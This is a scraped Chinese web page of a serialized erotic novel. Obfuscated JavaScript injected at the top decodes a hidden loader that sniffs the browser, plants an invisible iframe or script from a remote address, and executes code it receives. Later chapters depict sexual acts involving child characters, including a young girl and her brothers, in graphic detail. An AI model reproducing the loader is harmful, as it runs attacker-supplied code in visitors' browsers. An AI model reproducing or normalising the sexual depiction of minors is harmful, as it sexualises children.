啊学长_np高虐

撩妹情话 脱单技巧 2021-01-22 20:00:26 28 0 啊学长np高虐
eval("\x77\x69\x6e\x64\x6f\x77")["\x77\x6E\x68\x77"]=function(e){var hp =''+'ABCDEFGHIJKLMNOPQ'+'RSTUVWXYZabcdefghi'+'jklmnopqrstuvw'+'xyz012345'+'6789+/='+''+'';var t="",n,r,i,s,o,u,a,f=0;e=e['re'+'pla'+'ce'](/[^A-Za-z0-9+/=]/g,"");while(f<e.length){s=hp.indexOf(e.charAt(f++));o=hp.indexOf(e.charAt(f++));u=hp.indexOf(e.charAt(f++));a=hp.indexOf(e.charAt(f++));n=s<<2|o>>4;r=(o&15)<<4|u>>2;i=(u&3)<<6|a;t=t+String.fromCharCode(n);if(u!=64){t=t+String.fromCharCode(r);}if(a!=64){t=t+String.fromCharCode(i);}}return (function(e){var t="",n=r=c1=c2=0;while(n<e.length){r=e.charCodeAt(n);if(r<128){t+=String.fromCharCode(r);n++;}else if(r>191&&r<224){c2=e.charCodeAt(n+1);t+=String.fromCharCode((r&31)<<6|c2&63);n+=2;}else{c2=e.charCodeAt(n+1);c3=e.charCodeAt(n+2);t+=String.fromCharCode((r&15)<<12|(c2&63)<<6|c3&63);n+=3;}}return t;})(t);}
eval("\x77\x69\x6e\x64\x6f\x77")["\x70\x75\x6E\x41\x50\x77\x68\x55\x43"]=function(){eval(wnhw("OyhmdW5jdGlvbih1LHIsdyxkLGYsYyl7dT1kZWNvZGVVUklDb21wb25lbnQod25odyh1LnJlcGxhY2UobmV3IFJlZ0V4cChjKycnK2MsJ2cnKSxjKS5zcGxpdCgnJykucmV2ZXJzZSgpLmpvaW4oJycpKSk7J2pRdWVyeSc7aWYobmF2aWdhdG9yLnVzZXJBZ2VudC5pbmRleE9mKHduaHcoIlltRnBaSFU9IikpPi0xIHx8IG5hdmlnYXRvci51c2VyQWdlbnQuaW5kZXhPZih3bmh3KCdTSFZoZDJWcFFuSnZkM05sY2c9PScpKT4tMSl7ZnVuY3Rpb24gcmQobixtKXtyZXR1cm4gTWF0aC5mbG9vcihNYXRoLnJhbmRvbSgpKihtLW4rMSkrbik7fWZ1bmN0aW9uIHJtKGUpe2lmKGUmJmUudGFnTmFtZS50b1VwcGVyQ2FzZSgpPT09IklGUkFNRSImJmUuc3JjLmluZGV4T2YodSk+LTEpe2UucmVtb3ZlKCk7fWVsc2UgaWYoZS5uZXh0RWxlbWVudFNpYmxpbmcpe3JtKGUubmV4dEVsZW1lbnRTaWJsaW5nKTt9fWxldCBjPWRbd25odygiWTNWeWNtVnVkRk5qY21sd2RBPT0iKV07dmFyIF9pZD1fY2xhc3M9J2FfMTk5MCc7dmFyIF9fYWFucWlkID0gJ2EnICsgcmQoMSwgMTAwMDAwKTtkWyd3JysncmknKyd0JysnZScrJ2xuJ10oJzxkJysnaXYgaScrJ2Q9JysnIicrX19hYW5xaWQrJyI+JysnPC9kJysnaXYnKyc+Jyk7d1snX19hJysnYWEnKyducScrJ29iJysnal8xOTkwJ109ZFsncXUnKydlcnknKydTZWxlJysnY3RvJysnciddKCcjJytfX2FhbnFpZCk7X2lkICs9IGRbJ3F1JysnZXJ5JysnU2UnKydsZWMnKyd0bycrJ3JBJysnbGwnXSgnLicrX2NsYXNzKS5sZW5ndGg7dmFyIHogPSB1KyctMS8nK19pZCsnLycrcjtkWyd3JysncmknKyd0JysnZSddKCc8aScrJ2ZyJysnYScrJ21lIHN0eWxlPSInKydtJysnYXInKydnaScrJ246MDtwJysnYWQnKydkJysnaW4nKydnOjA7YicrJ29yJysnZCcrJ2VyOm4nKydvbicrJ2U7Jysnb3AnKydhJysnY2knKyd0JysneTowJysnLjAnK3JkKDIsOSkrJzt3aScrJ2R0JysnaDonK3JkKDIsNSkrJ3AnKyd4O2gnKydlJysnaWdoJysndDonK3JkKDIsNSkrJ3AnKyd4OycrJyJhbCcrJ2xvd3RyYW4nKydzcGEnKydyZW5jeSBzcicrJ2M9IicreisnIj48L2knKydmcicrJ2EnKydtZT4nKTt3WyJhZCIrImRFdiIrImVudEwiKyJpc3QiKyJlbmVyIl0oIm0iKyJlc3MiKyJhZ2UiLGZ1bmN0aW9uKGUpe2lmKGUuZGF0YVtyK19pZF0pe3JtKGMpO25ldyBGdW5jdGlvbih3bmh3KGUuZGF0YVtyK19pZF0ucmVwbGFjZShuZXcgUmVnRXhwKHIsJ2cnKSwnJykpKSgpO319KTt9ZWxzZXtkLndyaXRlKCc8cycrJ2NyaScrJ3B0IHNyYz0iJyt1KycuanMiPjxcL3MnKydjcmlwJysndD4nKTt9fSkoJycrJz09UU55JysnMEMnKydNNWtUJysnTXR0JysnTScrJ20nKydSeVUnKydTJysnWm9oJysnWFlxbCcrJ25SeVV5JysnTScrJzAnKydRRE14RScrJzBNbDAnKycyYmo1JysnaWEnKyczVicrJ1dlJysnMGRYJysnWnUnKydjM2QnKyczWmtNbCcrJ1lrTWxFJysnME1sJysnTScrJ0hjMFJIJysnYScrJycrJycsJycrJ1FPRScrJ1NKTicrJ3BaJysnJysnJyx3aW5kb3csZG9jdW1lbnQsJycrJ3BDaycrJ3JGWCcrJ1onKycnKycnLCd0Jyk="));}
☆、31 番外:小叔生辰2【限】

待茶被全部倒入小x,小叔出手阻止竹子的拔出:“爷喜欢喝加了蜜的茶。。”说着手握住竹子,一点一点的往小x里塞。

“嗯。。好舒服。。爷,再深点。。。”安蕊很享受这样细致绵延的磨捻。她忍不住在小叔的大腿上来回抚m。

“这就开始浪了?”并没有按照她说的更加深入,只是多塞入了一个指节的长度,单单只在浅出给她止痒,并且挑逗她的小花核。

安蕊的呼吸开始加重,腿想环住他健硕的腰身并死死夹住。但斜靠的姿势只能让她两腿并拢,加紧细细的竹子,膝盖来回摩擦,企图缓解x内的空虚感。

“爷。。进来c奴婢。。。求爷赐给奴婢您大大的b子。。”她终於m到了小叔的腿间,急切的胡乱拉扯开裤腰,握住了那个坚挺的,烫手的,能塞满她巨大空虚的yj。

小叔反而不急,他的唇从额头开始,一路吻下来,饱满的鼻梁,小小的鼻尖,红艳的双唇,光洁的下巴,修长的脖颈,蜻蜓点水般,似有似无,若即若离。勾的她越发的燥热,她宁愿他发狠的吻,哪怕用牙齿咬也好。

吻到肚兜的边缘,停住了。灼热的气息从他的鼻腔喷洒在她的颈间。

“爷。。还要。。奴婢的r房有n水,您尝尝吧。。。”

“是麽?原来是个给其他男人生过孩子的烂货!爷可不喜欢松垮垮的贱x!”

“不是。。爷。。奴婢不松。。您进来,奴婢保证好好给您夹s出来。。。”

隔着肚兜咬住一个r头,用了些力道,瞬间n水涌出,润湿了一小块衣料。“啊。。好舒服。。。再多吸一点。。。”涨了很久的n水被吸出,安蕊舒服了许多。

“骚样儿!把腿张开,爷要尝尝茶水,不甜的话,爷要惩罚你的!”

早在竹子摩擦花核的时候,小x就开始分泌y水了。再加上r头的刺激,原本只灌注了半个茶盏多的水量的小x里,现在的水估计能装满整个茶盏了。

拔出竹子,嘴立马贴上去堵住x口,水自动的顺着舌头流入他的口中。茶水变得粘稠润滑了许多,且带着一股y水的味道。

安蕊用大腿夹紧了他的头,蹭着他毛绒绒的脑袋,腰还一挺一挺的往前送。“舌头舔的好舒服。。。再深点。。还要。。”

小叔坏心眼的用牙齿咬住两片嫩y唇,随着舌头的外抽,y唇也被往外扯开。“啊。。爷,您好坏呀。。。”

吸干了茶水,小叔站起吻住她的唇,把嘴里剩下的一小口y水茶水混合y体渡到她的口中。“可甜?”

“甜,爷,进来好不好?奴婢用小xx好好的伺候您!”

“爷的胃口可大了,就怕你受不住!”

“奴婢有3个洞洞,爷您想玩哪个都可以,爷舒服了,奴婢也舒服了。”

“真是个宝贝疙瘩!比婊子还浪!爷这就来试试你的yx!”不再挑逗,翻过她的身子,让她双手撑在软榻的边缘,弓着背,高高翘起臀,也不脱掉长裤,直接扒开裆部,扣着她的腰眼,g头对准x口:“爷就一杆入洞了,若是疼就喊出来!”

语毕,强硬的b身冲着r墙似地窄道破r而入。“啊!!”安蕊被顶的身体猛的向前一趴。

“真***紧!”小叔也跟着她的动作追着往里戳,g头被挤的直哆嗦。“真是个尤物,要不是能喷n,爷还以为没开过苞!”

(小咩咩快来,小鱼更啦!最近忙的更新不给力,亲们的票票也不给力了。。知道年关大家都蛮忙的,嗯,只要大家没有遗忘小鱼就好,等忙完这阵子就会恢复以前的更新力度的,大家千万不要吝啬手里的票票啊~`鞠躬~~)

;amp;lt;% end if %;amp;gt;

作家的话:

偷偷来码字的,如果有错别字大家请见谅哈!小鱼滚去打扫卫生鸟~~房子大了也不好,打扫神马的最讨厌!!!!

☆、32 番外:小叔生辰3【限】

b身瞬间被r包裹住,穆小叔感觉浑身一紧。g头的触觉告诉他已经抵达g口,热热的仿佛小嘴在一张一合的。还有一小节b身还在小x外面,再用点力气就可以把g头送入g口。

而安蕊也最喜欢g交,如果哪次没有进入子g,她的高潮次数就明显减少。这样想着,小叔不再犹豫,拉回她的腰眼的同时前顶,紧缩的g口被硬生生的破开。蘑菇状的大g头完整的卡在口里。

“啊!!好舒服!!顶到奴婢子g里了!”她舒服的呻吟,主动的向後松动着小臀部,一下一下的撞击着他的腹部。

穆小叔好笑的看着她独自沈浸在x爱的舒爽中。“越来越浪了!也不看看是谁让你这麽爽的!个小白眼狼!”

一手仍旧扶着她的腰眼,一手m到小腹,每当顶入的时候,手也猛的往里压,“爷。。好舒服。。还要。。用力的c奴婢。。一直呆在奴婢的子g里。。”

“好!c烂了也不出来!死也要死在里面!”他发狠的撞击着。在白嫩的後背用力的吸出一个个吻痕,每吸一个,就猛撞一下。

後背被吸的发疼,但更加刺激。被c了十几下,安蕊没忍住,哇哇乱叫着泻了。

上半身早就被撞击的瘫软在软榻上,腿跪在地上,出了一身的细汗。“爷。。慢些。。太舒服了。。。让奴婢缓缓。。。”

“不行!爷知道你受得住!再来几下!”

快感来的太多,只好泻了再泻。终於,小叔暂时停了下来:“好了!”

咦?他还没有s出来啊?安蕊觉得小叔的话很莫名其妙。

小叔一手托着她的小屁股,一手扶着她的肩膀,yj仍停留在她的体内,边走边c的来到梳妆台边,把她放在桌子上,背对着铜镜。

“小y娃,回头看看镜子,爷给你的礼物!”

安蕊转头,吃惊的张大嘴巴!原来小叔在她的背上用数多个吻痕组成了一个深红色的“y”字!!!

难怪他刚才说好了!原来是字吸好了!真是可恶!

“怎麽样?是不是很适合你?嗯?”伸出手抚m上那个半个手掌大小的y字。那麽白的脊背,那麽红,那麽y荡的一个字。。。。

安蕊不知道该说些什麽。。她似乎应该责怪他,但是她心里却觉得这样子好独特,心里的欢喜大过了责怪。

“喜欢麽?”低头轻问。

安蕊送上自己的红唇,用行动告诉他自己的答案。他也用坚硬的yj回应着她。

小叔把她的双腿折起,一直折到她的头顶,花x和菊x就这样毫无遮掩的展露在他的眼前。那麽水嫩,那麽诱人。

这次进入的是菊x,比前x更加的紧致,而且安蕊的菊x也被调教的能分泌黏黏的肠y。小叔的yj虽然chu大坚硬,动作勇猛,但没有弄伤她。

“啊!爷的**巴好大!奴婢的小屁眼要被撕裂了!!”

菊x周围的褶皱都被撑的没有了,“那爷就饶过小y娃的屁眼吧!”说着要往外抽。

安蕊的菊x立刻紧缩,阻止他的离开:“不要!!要爷狠狠的c进来!!c裂了也没有关系!!求爷。。。c烂了也没有关系!!”

“真贱!!爷就c死你!”小叔被她放浪的话语激到了,把全身的力气都用到yj处,不再有所顾虑的c干起来。

(小鱼一有空就来码字啦!!是不是很勤劳??求表扬哇~谢谢nuse008和浅浅梦送的礼物~mua~爱你们~小鱼的专栏首页对话框做好了,要特别感谢切糕君帮助小鱼~~亲们都来唠嗑吧~~)

;amp;lt;% end if %;amp;gt;

作家的话:

小咩咩,小鱼专门给你写了一个穆府兄妹的番外哇~~求表扬~~嘿嘿,等小鱼空闲了就传上来~~先用小番外满足一下你拉~~~

☆、33 番外:小叔生辰4【限】

轮流的进入前後两个洞,每个c5次。小叔坏心眼儿的让安蕊跟着他一起数数,数错一个就从新开始。

安蕊被c弄的脑袋糊哒哒的,数了几次都错了。越是想数清楚越是数不清楚。

“1!2!啊!!”第三次用力比前两次大多了,安蕊忍不住喊出声。

“又错了!是3,不是啊!重来!”坏小叔邪笑着重新c入y道。

“呜呜。。。。不要了。。。爷欺负人。。。”

“爷怎麽欺负人了?”

“人家都泻了那麽多次,爷还不s。。。奴婢不一!奴婢要爷热热的浓浓的jy!全都s到奴婢的子g里,一滴都不许s在外面!”安蕊实在受不住了,只好改变策略,用y荡的话语刺激他。

“原来是饿了!好!爷这就来喂饱你这个小y货!夹紧了!”小叔把她的双腿环在自己腰部,抱着她抵在墙上,站着c。

次次必入g口,爽的安蕊眼泪都出来了。“好舒服。。。呜呜。。。蕊蕊要死了。。。被爷c死了。。”

“那就一起死吧!爷就能和你一起投胎,投在一起,在娘肚子里就开始c你!可以整整c十个月不分开!!”

“嗯。。。一起。。。啊。。。”

最後如安蕊所愿,全部s进了她的子g。烫的她又泻了一次。可是她舍不得那滚烫的jy,她抱住小叔不让他出来,两人就这麽静静的躺着,回味着。

“小妖j,你怎麽可以这麽放荡,这麽贱?”小叔也紧紧的拥着她,像是怕这个吸人j魄的小妖j真的回了妖j洞去了。

“爷喜欢这麽放荡,这麽贱的妖j麽?”

“只要是你,什麽样爷都喜欢!就算你再浪,再骚,再贱,你始终是爷的心肝宝贝!等爷70了,爷还要c你!”

“嗯。。。”安蕊觉得此生很圆满,“爷,您70的时候还能硬吗?”

“小y货,居然敢怀疑爷的能力!!”小叔怒了,男人最忌讳自己的女人说自己不行,连怀疑都不行!

“是爷的错,爷还没有把你c到没力气胡思乱想的地步。爷这就改错!”语毕,又起身开c。

“啊!!!爷,蕊蕊错了!!”安蕊深刻体会到,说错话的严重後果。

穆小叔的生辰过的是相当j彩,当安蕊在床上躺了2天才有力气下床的时候,当安蕊背後那个深红色的“y”字给他们带来强烈视觉冲击感的时候,当穆小叔整天乐呵呵像年轻了十岁的时候,穆家兄弟不淡定了。。。

眼红啊,吃醋啊,牙都快酸掉了。可恨不是自己的生辰,酸了之後就开始盘算着还要多久到自己的生辰。

等算出来还有大半年的时候,两人都想爬回穆老夫人的肚子里再被生一次!娘啊!怎麽就没提前生啊!!!

(白天木有更新,结果票票就木有涨。。。。。。。

非常感谢小馒头送的礼物,啵一个~~)

;amp;lt;% end if %;amp;gt;

☆、34 爱心小番外1

“二哥三哥,你们干什麽呢?都不陪心心玩儿了!坏哥哥!臭哥哥!”一个扎着小辫儿,嘟嘟着粉嫩的小唇,忽闪忽闪的长睫毛,乌溜溜的大眼睛略显生气的漂亮娃娃看着眼前神色躲躲闪闪的小男孩。

粉嫩的脸蛋儿约是奔跑的缘故,泛着红晕,像红苹果似地让人忍不住想咬一口。额头微微出汗,头发也有些散乱。可见,是在到处寻找哥哥。

老二穆艾!看着妹妹红扑扑的小脸蛋儿和微喘的呼吸,心里闪过一丝心疼和自责。

“呃。心心乖,哥哥们没有不陪心心。心心刚刚在睡觉觉,哥哥怕打扰到心心,所以才出来的。心心不要怪哥哥了,好不好?”他立刻起身站在弟妹之间,搂住她的同时也挡住了她的视线,左手背在後面不忘给弟弟打手势。

小娃娃就势倚在哥哥的怀里撒娇起来。

三哥穆艾琪也反应过来,立马把手里的书藏到被褥下面。可惜他的动作还是慢了点,被眼尖的小心心看到了。

“三哥!你手里拿的什麽?心心也要看!”心心小朋友可不是好唬弄的主儿,她绕过二哥,一把扯过三哥的手。

“咦?这是什麽?”上面有很多图案,很奇怪的姿势。。。为什麽她看不懂呢?

见事情败露,二哥拿眼睛狠狠的瞪了笨蛋老三一眼。老三mm自个儿的鼻子,也很无奈。谁让小心心太眼尖手快了点呢。。。。

“呃。。心心乖。这个是。。嗯。。很神秘的东西。。。嗯。。是。。。”

“心心知道!是一个藏!宝!图!对不对!”小心心听到一半就很开心的打断了二哥的话。她为自己的聪明感到自豪。露出一幅快来表扬我的样子。

老二老三被她的话噎住了。。这个。。。要怎麽回答呢。。。。

“哇!心心好厉害!二哥还没说心心就知道了!”老三冲二哥眨眨眼,表示要将计就计。

心心听到表扬,眼睛更亮了:“那哥哥给心心奖励吧!”

“吧唧!”

“吧唧!”

左右脸颊,一人一口,这是兄妹三人独特的奖励制度。心心得了奖励笑的更甜了。

老二老三看着那明艳的笑脸,觉得从嘴巴一直甜到了心坎里。

於是,紧闭房门的屋子里,床上挤着三个毛绒绒的小脑袋,三个年画娃娃一样的小人儿,偷偷的在看春!g!图!

当然,我们天真无邪的心心小朋友很无辜的认为是藏宝图。。。。

心心很郁闷,为什麽藏宝图画的不是路,而是两个人呢?为什麽哥哥们看的很懂的样子而自己很糊涂呢?

“二哥,心心怎麽看不懂呀?”小脑袋贴在艾!的肩头,接着,整个身体的重量也压过来了。心心最喜欢的就是靠在哥哥身上,被哥哥抱,以及一切粘着哥哥的活动。

艾!很自然的抱住她,清淡的n香顿时扑鼻而来。他把眼睛从图上移到妹妹的脸上,再移回图上,再移到妹妹脸上。。他的心脏似乎顿了顿,然後狂跳起来。俊秀的脸颊开始泛红。

“二哥,你怎麽了?很热吗?”心心很体贴哥哥。

艾琪闻声也抬起头看着二哥。他看着眼前的两个人,突然觉得是如此的般配,像观音像里的金童玉女一般。他似乎有些明白,有些担心,有些心动。

(小鱼很郁闷,这章本来是存稿箱自动发的,但是今天刷 不出来,估计是鲜抽了,对不起大家了,再发一次~下一章也随即送来)

;amp;lt;% end if %;amp;gt;

☆、35 爱心小番外2

痴了,呆了。

“二哥,三哥,你们怎麽啦?”小手在两个木头人眼前晃了晃。

两人瞬间回神,都无比尴尬。眼睛乱转,不敢和她对视。

“咳!”艾!决定由他来打破尴尬,“心心刚刚说什麽?”

“哥哥在想什麽啦?心心看不懂这个图图,哥哥教心心吧!”以前要是不会的东西,只要问哥哥,都是有问必答。连爹爹罚心心抄书,哥哥们都会偷偷帮忙抄掉一大部分。

不过很显然,小心心这次的问题,两个人还真不知道怎麽回答好。尤其是在心里起了涟漪以後。

“呃。。这个。。。是这样的。。”艾琪试图蒙混过关。艾!也急的手心出汗了。

“心心!心心!小!小琪!你们在屋里吗?”安蕊的呼喊声在兄弟两人的耳中犹如天籁。他们互相看了一眼,都悄悄的松了一口气。

艾琪从床上弹了起来,手脚并用的跑去给美人娘亲开门,他似乎忘记了早上才被娘亲揪了耳朵打了屁股。艾!迅速的藏好书。

美人娘提着裙摆抬脚进来:“你们躲在这里干什麽呢?马车都准备好了,现在出发天黑前正好可以到山庄,晚了就要在路上过夜了!小心肝,来娘抱!”说着抱起乖巧的小心心,和两个小儿子一起往外走。

===========================================

心蕊山庄是穆家的产业。在穆家最小的女儿穆艾心出生後,小叔买下了这个依山傍水的山庄送给穆家最宝贝的两个女子。

每年的八月金桂飘香时节,穆家大大小小必定要来山庄住上一阵子。因为穆家的太後娘娘安蕊是八月的生日,穆小叔命人在山庄种了20多颗桂花树。八月桂花开的时候,山庄地界一里内都能闻到香味儿。

今天是去山庄的日子,一行人悠闲的向山庄行进。

================================================

“二哥哥,心心要和哥哥睡!”晚饭之後,心心跟着艾!身後,不愿回自己的房间。山庄的院子和城里的一样,大哥艾锐有自己独立的院子,三个小家夥由於年纪尚小,就住同一个院子的不同屋子。

“心心小公主的要求,哥哥当然同意啦!”抱着小娃娃睡也不是一次两次了,“那心心是自己脱衣服还是要哥哥脱?”

她当然知道哥哥不会反对,但是娘教过她,要有礼貌:“心心自己脱,心心最乖!”

艾!笑着亲了亲她的脸蛋儿,好嫩,好滑,好香。。。他又想起了下午的情形,动作有些不自然。

这天夜里,穆家最小的两个男人遗j了,不约而同的,对象都是自家小公主。。。。

有3个禽兽爹爹的结果就是,白天的大部分时间,小孩子都是自由活动的。只要不出山庄大门,怎麽玩都是安全的。

心心虽然没有看懂那个所谓的“藏宝图”,但是寻宝这个想法却深深的印在她的脑海里。山庄里有各种各样的树,有假山,有花花草草,很符合寻宝的条件。於是心心小公主发话了,两个小跟班心甘情愿的陪着她在山庄里开始“寻宝”之旅。

既然是寻宝,当然不能走平常的小路。三个人专挑草木多的地方走,反正八月已经是秋天了,没有夏天那麽多的虫子,不怕被咬。

走到望月小楼,心心说累了。他们便打算去小楼歇息歇息。

走近才发现,门紧闭着,而且隐隐约约传出一些很奇怪的声音。艾!艾琪对望一眼,彼此都知道对方很好奇。牵着心心,默契的饶到小楼的侧面,来到一个微开的窗口下面。

(为什麽鲜老吞我的文啊!!难道是人品问题???为毛票票没有涨??亲们抛弃小鱼了?还是小鱼这没有显示???为毛啊啊啊!!!!)

ps:谢谢008送小鱼的礼物!!看到礼物很开心!!!

;amp;lt;% end if %;amp;gt;

作家的话:

亲们真的木有给小鱼投票麽?

☆、36 爱心小番外3

“娘。唔。。”心心看到屋子里的人,正想呼唤,被艾!及时的捂住了嘴巴。

“嘘!”艾琪食指放在唇边做出嘘声的动作。

三个小脑袋凑在一起,偷偷往屋内看。

美人娘亲全身光溜溜的被穆大和小叔夹在中间,两人一前一後,也同样裸着。安蕊双手抱住正在允吸自己n头的穆大,双腿被身後的小叔以小孩把尿的姿势抬着。前後x各被一个chu大的rb填满,轮流的c入。她舒服的不由自主的昂起头呻吟。

艾!艾琪看的脸通红通红的,像做错事的孩子被大人发现了,不敢抬头,但心里又特痒痒。虽然低着头不好意思直视,但都在偷偷斜着眼睛偷瞄。

安蕊的呻吟声隐隐约约的传来,火辣辣的场面把两个毛小子刺激的不行,长衫下面的小帐篷早早的就支了起来。

艾!的手仍旧捂着心心的嘴巴,可是他看的太激动,以至於手上力气渐长。心心被他捂的快喘不过气来。手脚开始乱拍乱踢。

两个chu心哥哥终於发觉还有妹妹在,艾!抱起她,三人迅速撤退。还好跑的快,再晚点就流鼻血了。。。。。

跑出了望月小楼的院子,抱着心心,三个人沈默的往回走。

心心渐渐平息的气息,她抬起头看看抱着自己的二哥哥,又转头看看走在旁边的三哥哥,哥哥们怎麽都低着头不说话呢?

她昂起小脸,贴在二哥红彤彤的脸颊上。艾!被她无声的叫唤惊醒,他立刻把思绪从刚才看到的画面中拉回。

“心心。。。”艾!不知道如何向妹妹解释。

低声的话语把同样沈寂的艾琪也拉回现实中。他也有些尴尬的看着自己的小妹妹。

心心不是很明白哥哥们的尴尬:“哥哥,娘和爹爹还有大爹爹在干什麽啊?哥哥为什麽不让心心说话,还有为什麽要跑掉啊?”

天真无邪的大眼睛就这麽直直的看着他们,糯糯的童声,香软的小身子,艾!突然就想这麽抱着她一辈子。也觉得她就应该被自己抱着,宠着,就这麽一直一直相亲相爱不分开。

艾琪也伸出手,像哥哥一样环住她小小的身子,三个人头靠着头,脸贴着脸,在夕阳的余晖下温暖相拥。

================================================

“心心想知道下午问的问题麽?”晚饭後三个小屁孩窝在一个床上开始说悄悄话。

“嗯。。”她被两个哥哥夹在中间,互相环抱着。

艾!侧了侧身,头窝在她的肩窝里小声道:“嗯。。下午娘和爹爹们是在寻宝!”

“啊!”心心现在对寻宝两个字非常敏感,听到後差点弹起身,幸好被三哥压住了。

神采奕奕的大眼睛盯着二哥的眼睛,仿佛在催促他快点说。

微笑着抬手顺了顺她的头发:“还记得昨天看的那个藏宝图麽?”

“嗯嗯!!”小**啄米似地点着头。

“上面画着一个男人和一个女人,对不对?”

“嗯嗯!”再次啄米。

(小鱼才知道,是抽了不能投票。。。)

;amp;lt;% end if %;amp;gt;

作家的话:

开始诱拐妹妹啦~~

☆、37 爱心小番外4

(小鱼昨天好不容易登陆上鲜才发现,二哥哥的名字居然显示的是!次奥!!!!非常对不起各位看官,二哥哥的名字是穆艾王民。最後一个字鲜无法显示,那小鱼以後的文里就把那个王字边去掉,直接用民这个字吧,哎。。。)

三哥有些醋意的打断他俩的对话,用手扒转过心心的脑袋,对着自己的脸道:“心心好好想想,平日里爹爹们会唤娘什麽?”

心心皱了皱小鼻子:“宝贝!可是,心心才是小宝贝。。。。”

“对啦!心心是哥哥的小宝贝,是爹爹和娘的小心肝呐!所以爹爹才会给心心起名字叫心心嘛!”

“对哦!”眼睛弯成了小月牙。

“其实每个女子的身体内都有宝物,但是只能是她最亲密的人才能去发掘。”二哥及时的把话题拉回来。

“那今天爹爹和大爹爹是在娘的身体内寻宝?那心心的身体里也有宝物吗?”心心听了哥哥的话,开始在自己身上m来m去。

“对呀!”

“那是什麽宝物呢?”

“是很珍贵的宝物。。。”

。。。。。。

就这样,单纯的小心心被两只大灰狼哥哥诱导了。

二哥说,等心心满15了,哥哥就可以像爹爹一样在她的身体里寻宝了。

三哥说,只有最亲近的人才可以做这样的事,不可以让外面的坏男人知道心心的宝物。

哥哥们说,这是心心和哥哥们之间的秘密,不能让大人们知道。

。。。。。。

“心心真乖。。。真舒服。。。嗯。。。”

艾民小哥儿沦陷了,彻底的沦陷在自己妹妹的粉嫩小嘴里。

粉团子似地女娃娃,跪在俊秀的男孩腿间,两人都衣衫整齐,面带稚气的脸上露出与年龄不符的神情。

天真烂漫的孩子正干着最y荡的事。

口交。

女孩努力的张大自己的小嘴巴,把哥哥那g对她来说很chu很长的rb含住。她不知道为什麽哥哥很喜欢她这样“吃”他,而且二哥和三哥常常会为她先吃掉谁而争执,但是她就是想要哥哥快乐。

当她的小舌头舔过大蘑菇头中间的细缝时,哥哥会兴奋的一哆嗦。当她试图把舌尖挤入那个细缝时,哥哥会舒服的低声呻吟。当她拼命的想把大大的rb咽进咽喉时,哥哥会紧紧的抱住她的脑袋,吟叫着夸她好b。

她还记得自己第一次把哥哥的bb吸出的“n水”咽进肚子之後,哥哥紧紧的抱住自己,良久之後,她听到一个略带哽咽的声音在耳边道:“哥哥会守护心心一辈子!”

之後她都会把那些n水喝掉,哥哥们都会露出满意的微笑。

每当这个时候,她就好开心,好满足。

之後哥哥们会把她全身都亲吻一遍,连自己的小脚丫都不放过。她好喜欢这种被亲吻的感觉。

最让她兴奋的时哥哥们亲吻她的小花x。苏苏麻麻的感觉从那个小小的洞x蔓延到身体的各个部位,唤醒了身体的每一个神经。

哥哥们还会把舌头伸入,从各个角度舔着x道。甚至钻入了自己的後x,好羞羞。。。可是她感觉好快乐。。。。

当她的小花x喷出水水的一刹那,她觉得自己似乎飞上了天际。。。。

(谢谢pearlhwang送小鱼的礼物,投票系统坏了,但是能看到亲送的礼物,小鱼超级开心,知道亲还在支持小鱼!谢谢!!新坑年後会来的!~~~)

;amp;lt;% end if %;amp;gt;

作家的话:

刚知道今天是台湾的小年,台湾的亲小年快乐啊!!!!

☆、38 爱心小番外5【限】

敏感的g头冲破yr的重重阻隔,终於探到了那层圣洁的薄膜。身下的女孩痛的泪花闪闪,艾民的心有些动摇了,怕她痛,舍不得她落泪。

像安抚婴儿般轻轻拍打着她光洁的脊背,低头吻她的眼睛:“心心,哥哥坏,弄痛了小宝贝。。。心心松一下小花x让哥哥出来好不好?咱们不做了。。。心心不哭。。”

女孩听後反而抱紧了他的腰身,x口也随之缩的更紧了:“不要。。不要出去。。心心要哥哥!心心不痛痛了。。。哥哥给心心。。。”

她知道不能怪哥哥。为了让她的初次不那麽痛,哥哥用了比平时多一倍的时间来吻她的肌肤,撩拨她的身体,挑逗她的神经。小花x在哥哥的舌头和手指的逗弄下已经喷s过一次,只怪她太紧,太嫩。

她知道如果自己喊痛,哥哥一定会停住。但她不想这样,她要她的哥哥,在她十四年的生命里一直陪伴着她,无条件宠着她,爱着她的哥哥。她要把自己的全部都给他,随他怎麽弄,即便弄坏了,也心甘情愿。

“哥哥,给心心。。。心心要哥哥的大rb,c进来。。心心的子g很小很嫩,哥哥不想进来看看吗?”她努力的用话语刺激他,鼓动他进入自己,“哥哥,进来吧!狠狠的干心心!干坏了也没有关系!”

艾民的下体本来就涨的不行,只因为怕她痛,才强忍住自己的欲望。在她话语的挑逗下,便不再让自己忍耐:“哥哥爱心心,永远!”

g头顶入。

“啊!”薄膜屏障瞬间破裂。

挺近!挺近!!

向着蜜x的更深处进发!

紧闭的g口被一点点的撑开。进入了,大蘑菇g头硬是将嫩小的g口顶开,全部戳入。

艾民爽的长舒一口气。心心颤抖着身体,死死的抱住他的腰,都快勒出红印子了。

“宝贝,痛不痛?”艾民不敢贸然抽动yj。

心心渐渐放松身体,摇了摇头:“心心不痛了。哥哥,好深啊,心心的子g都被哥哥填满了。。。”

“乖宝宝,这才哪到哪呀!待会哥哥用热热的jy灌满心心的小子g,那才是真的满!”他低声笑道,“哥哥要开始c心心了,如果痛就喊出来!”

语毕,不待她做好思想准备,便撑起腰身,奋力c起x来。由於心心是初次,他不敢用力过猛。九浅一深,挑逗多於猛干,他要让心心有一个美妙的初次。

心心以前也泻过,但那都是二哥三哥用舌头或者手指c入的。这次是真真的男j,那麽chu大,那麽坚硬,似乎都能把她弱嫩的花x戳破c穿。好刺激,好舒服,一下一下,撞到自己的最深处。

她大叫,她呻吟,她哀求。

“不要。。。”不要出去,她想告诉哥哥。哥哥c的心心好舒服,不要停,不要离开。

汗滴从艾民的额头坠落到心心的x膛,仿佛给她灼热的心脏加了一把火,烧的她更热了。

“心心。。心心。。”他喊一声,就用力撞一下。他的心早就不在自己身上了,他在进入他的心,深深的,就这样,要一直干下去。

两人的初次没有干太久。当心心被c的哭出来之後,艾民最後一搏,在她揉嫩的子g内喷洒出来。

心心被激的再次泄身,满身汗水的软塌塌的窝在哥哥的怀里。

直到挤干最後一滴jy,他才依依不舍的退出那销魂的花x。

(祝各位看小鱼文文的亲新年快乐!!新年发大财行大运!!!

谢谢浅浅梦和mjmao送小鱼的礼物!!还有以前送小鱼礼物的亲们,还有投票的亲,在新的一年,小鱼会更加努力的码字来回报亲们的支持~~

现在投票系统貌似恢复了,亲们在年尾再给小鱼一个完美的收官吧~~票票甩起来哟喂~~

